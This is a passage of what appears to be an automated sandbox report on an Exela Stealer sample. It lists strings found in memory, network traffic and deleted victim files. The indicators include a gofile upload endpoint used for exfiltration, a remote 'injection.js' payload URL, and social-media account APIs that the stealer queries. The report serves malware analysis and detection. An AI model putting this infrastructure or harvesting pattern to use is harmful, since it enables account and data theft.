rename_me_before.exe, 00000001.00000002.1977307117.000001B100CD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/pull/28073
            Source: rename_me_before.exe, 00000001.00000003.1966972745.000001B102228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/quicaxd/Exela-V2.0
            Source: rename_me_before.exe, 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/quicaxd/Exela-V2.0/Exela-V2.0
            Source: rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/quicaxd/Exela-V2.00
            Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/quicaxd/Exela-V2.0p
            Source: METADATA.0.drString found in binary or memory: https://github.com/sponsors/hynek
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://github.com/sponsors/hynek).
            Source: rename_me_before.exe, 00000001.00000003.1965401133.000001B17E4F0000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966237596.000001B17E535000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1981201596.000001B17E536000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1667996233.000001B17E531000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1668933285.000001B17E528000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1669358961.000001B17E510000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1670306810.000001B17E523000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1668055844.000001B17E535000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1669127853.000001B17E528000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965746028.000001B17E529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
            Source: powershell.exe, 00000045.00000002.1826414031.000001DBBFC44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: rename_me_before.exe, 00000001.00000003.1946914217.000001B103351000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1891303123.000001B103351000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1980706775.000001B103351000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.micros
            Source: rename_me_before.exe, 00000001.00000003.1964419181.000001B102D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gofile.io/d/ukhEgs
            Source: rename_me_before.exe, 00000001.00000002.1979075425.000001B101E80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gofile.io/d/ukhEgs)
            Source: rename_me_before.exe, 00000001.00000002.1980340485.000001B103050000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gofile.io/d/ukhEgs)P
            Source: rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gql.twitch.tv/gql
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://hynek.me/articles/import-attrs/)
            Source: rename_me_before.exe, 00000001.00000003.1948127865.000001B1028B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.hid
            Source: rename_me_before.exe, 00000001.00000003.1948127865.000001B1028B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.hidHdJb
            Source: rename_me_before.exe, 00000001.00000003.1966972745.000001B102228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.hizliresim.com/6t31tw2.jpg
            Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://i.hizliresim.com/6t31tw2.jpg0
            Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://i.hizliresim.com/6t31tw2.jpgP
            Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://i.hizliresim.com/8po0puy.jfif
            Source: rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://i.hizliresim.com/eai9bwi.jpg
            Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://i.hizliresim.com/eai9bwi.jpg0
            Source: rename_me_before.exe, 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://i.hizliresim.com/qxnzimj.jpg
            Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://i.instagram.com/api/v1/accounts/current_user/?edit=true
            Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://i.instagram.com/api/v1/users/
            Source: rename_me_before.exe, 00000000.00000003.1662701366.000001CF0A295000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drString found in binary or memory: https://img.shields.io/pypi/v/cryptography.svg
            Source: rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://instagram.com/
            Source: rename_me_before.exe, 00000001.00000003.1965048386.000001B10058E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
            Source: rename_me_before.exe, 00000001.00000002.1976728516.000001B1009F2000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1968294358.000001B1009F1000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1953054230.000001B1009CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
            Source: rename_me_before.exe, 00000000.00000003.1662701366.000001CF0A295000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drString found in binary or memory: https://mail.python.org/mailman/listinfo/cryptography-dev
            Source: powershell.exe, 00000045.00000002.1843174125.000001DBCF1C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000045.00000002.1826414031.000001DBC0974000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000045.00000002.1843174125.000001DBCF082000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: rename_me_before.exe, 00000001.00000003.1890796970.000001B1033C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870
            Source: rename_me_before.exe, 00000001.00000003.1946245078.000001B103636000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1967359730.000001B100BB9000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1891447549.000001B101FE6000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1964107785.000001B100BB9000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977030207.000001B100BB9000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1954269002.000001B100BB9000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1964950200.000001B100BB9000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1890796970.000001B1033C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://o64374.ingest.sentry.io;
            Source: rename_me_before.exe, 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://oauth.reddit.com/api/v1/me
            Source: svchost.exe, 0000002A.00000003.1749773200.000001D218CC2000.00000004.00000800.00020000.00000000.sdmp, edb.log.42.dr, qmgr.db.42.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
            Source: edb.log.42.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
            Source: powershell.exe, 00000045.00000002.1826414031.000001DBC06A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
            Source: powershell.exe, 00000045.00000002.1826414031.000001DBC06A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
            Source: rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://open.spotify.com/user/
            Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://open.spotify.com/user/P
            Source: rename_me_before.exe, 00000001.00000002.1974448798.000001B100440000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://peps.python.org/pep-0205/
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://pypi.org/project/attrs/)
            Source: rename_me_before.exe, 00000000.00000003.1662701366.000001CF0A295000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drString found in binary or memory: https://pypi.org/project/cryptography/
            Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/justforExela/injection/main/injection.js
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://raw.githubusercontent.com/python-attrs/attrs/main/docs/_static/attrs_logo.svg
            Source: rename_me_before.exe, 00000000.00000003.1662701366.000001CF0A295000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.drString found in binary or memory: https://readthedocs.org/projects/cryptography/badge/?version=latest
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://stackoverflow.com/questions/tagged/python-attrs)
            Source: rename_me_before.exe, 00000001.00000002.1980252152.000001B102F50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://store1.gofile.io/uploadFile
            Source: rename_me_before.exe, 00000001.00000003.1719040380.000001B103473000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978690429.000001B101C80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D04000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
            Source: rename_me_before.exe, 00000001.00000003.1719040380.000001B103473000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
            Source: rename_me_before.exe, 00000001.00000003.1719040380.000001B103409000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978690429.000001B101C80000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1719040380.000001B1034AA000.00000004.00000020.00020000.00000000.sdmp, Historys.txt.1.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: rename_me_before.exe, 00000001.00000003.1719040380.000001B1033E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: rename_me_before.exe, 00000001.00000003.1949293092.000001B103309000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1980548513.000001B103309000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949632345.000001B103309000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1719040380.000001B103409000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966669110.000001B103309000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978690429.000001B101C80000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1719040380.000001B1034AA000.00000004.00000020.00020000.00000000.sdmp, Historys.txt.1.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: rename_me_before.exe, 00000001.00000003.1719040380.000001B1033E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: rename_me_before.exe, 00000001.00000003.1966972745.000001B102228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/ExelaStealer
            Source: rename_me_before.exe, 00000001.00000002.1980252152.000001B102F50000.00000004.00001000.00020000.00000000.sdmp, system_info.txt.1.dr, Cookies.txt.1.dr, network_info.txt.1.dr, Historys.txt.1.dr, process_info.txt.1.drString found in binary or memory: https://t.me/ExelaStealer----------------------
            Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://thumbnails.roblox.com/v1/users/avatar?userIds=
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=pypi
            Source: METADATA.0.drString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=referral&utm_campa
            Source: rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tiktok.com/
            Source: rename_me_before.exe, 00000001.00000002.1980340485.000001B103050000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com
            Source: rename_me_before.exe, 00000001.00000002.1980340485.000001B103050000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
            Source: rename_me_before.exe, 00000001.00000002.1980340485.000001B103050000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/home
            Source: rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/homeP
            Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/i/api/1.1/account/update_profile.json
            Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D04000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1979075425.000001B101E80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://webcast.tiktok.com/webcast/wallet_api/diamond_buy/permission/?aid=1988&app_language=de-DE&ap
            Source: rename_me_before.exe, 00000000.00000003.1662503428.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, LICENSE.APACHE.0.drString found in binary or memory: https://www.apache.org/licenses/
            Source: rename_me_before.exe, 00000000.00000003.1662615614.000001CF0A2A0000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1662503428.000001CF0A2A0000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1662689097.000001CF0A2A1000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1662503428.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, LICENSE.APACHE.0.drString found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
            Source: METADATA.0.drString found in binary or memory: https://www.attrs.org/
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/)
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/23.2.0/_static/sponsors/FilePreviews.svg
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/23.2.0/_static/sponsors/Tidelift.svg
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/23.2.0/_static/sponsors/Variomedia.svg
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/latest/glossary.html#term-dunder-methods)).
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/latest/names.html)
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/stable/changelog.html
            Source: METADATA.0.drString found in binary or memory: https://www.attrs.org/en/stable/changelog.html)
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/stable/comparison.html#customization)
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/stable/init.html#hooking-yourself-into-initialization)
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.attrs.org/en/stable/why.html#data-classes).
            Source: rename_me_before.exe, 00000001.00000002.1980252152.000001B102F50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
            Source: rename_me_before.exe, 00000001.00000003.1719040380.000001B103473000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D04000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
            Source: rename_me_before.exe, 00000001.00000003.1719040380.000001B103473000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: rename_me_before.exe, 00000001.00000003.1949293092.000001B1032A6000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1970308905.000001B102229000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1963524951.000001B100A7B000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965367237.000001B100B88000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1953054230.000001B100A7B000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1969084056.000001B102228000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1964107785.000001B100A7B000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1976940031.000001B100B8A000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966972745.000001B102228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
            Source: rename_me_before.exe, 00000001.00000003.1719040380.000001B103473000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: rename_me_before.exe, 00000001.00000003.1719040380.000001B103473000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978027683.000001B101458000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: rename_me_before.exe, 00000001.00000003.1949293092.000001B1032A6000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978690429.000001B101CCC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
            Source: rename_me_before.exe, 00000001.00000003.1719040380.000001B103473000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: rename_me_before.exe, 00000000.00000003.1663988255.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, libcrypto-3.dll.0.drString found in binary or memory: https://www.openssl.org/H
            Source: rename_me_before.exe, 00000001.00000002.1976728516.000001B1009F2000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1968294358.000001B1009F1000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1953054230.000001B1009CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
            Source: rename_me_before.exe, 00000001.00000002.1981358821.000001B17FE20000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
            Source: rename_me_before.exe, 00000001.00000002.1980340485.000001B103050000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/user/
            Source: rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/user/P
            Source: rename_me_before.exe, 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.roblox.com/my/account/json
            Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.roblox.com/my/account/json0
            Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.spotify.com/api/account-settings/v1/profile
            Source: rename_me_before.exe, 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/passport/web/account/info/?aid=1459&app_language=de-DE&app_name=tiktok
            Source: rename_me_before.exe, 00000001.00000002.1976903040.000001B100B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/passport/web/account/info/?aid=1459&app_language=de-DE&app_name=tiktok_web&ba
            Source: rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.twitch.tv/
            Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drString found in binary or memory: https://www.variomedia.de/
            Source: rename_me_before.exe, 00000001.00000003.1965506103.000001B1005D5000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966055870.000001B100617000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1975824517.000001B100655000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1968170677.000001B100654000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965777162.000001B1005E8000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965048386.000001B10058E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zopeinterface.readthedocs.io/en/latest/
            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS

            Spam, unwanted Advertisements and Ransom Demands

            barindex
            Modifies existing user documents (likely ransomware behavior)
            Source: C:\Users\user\Desktop\rename_me_before.exeFile deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\ONBQCLYSPU.pdfJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\VLZDGUKUTZ.jpgJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\KZWFNRXYKI.pdfJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\DVWHKMNFNN.jpgJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeFile deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\VLZDGUKUTZ.docxJump to behavior
            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404FFBD80_2_00007FF6404FFBD8
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF640505C740_2_00007FF640505C74
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF640504F100_2_00007FF640504F10
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF6404E10000_2_00007FF6404E1000
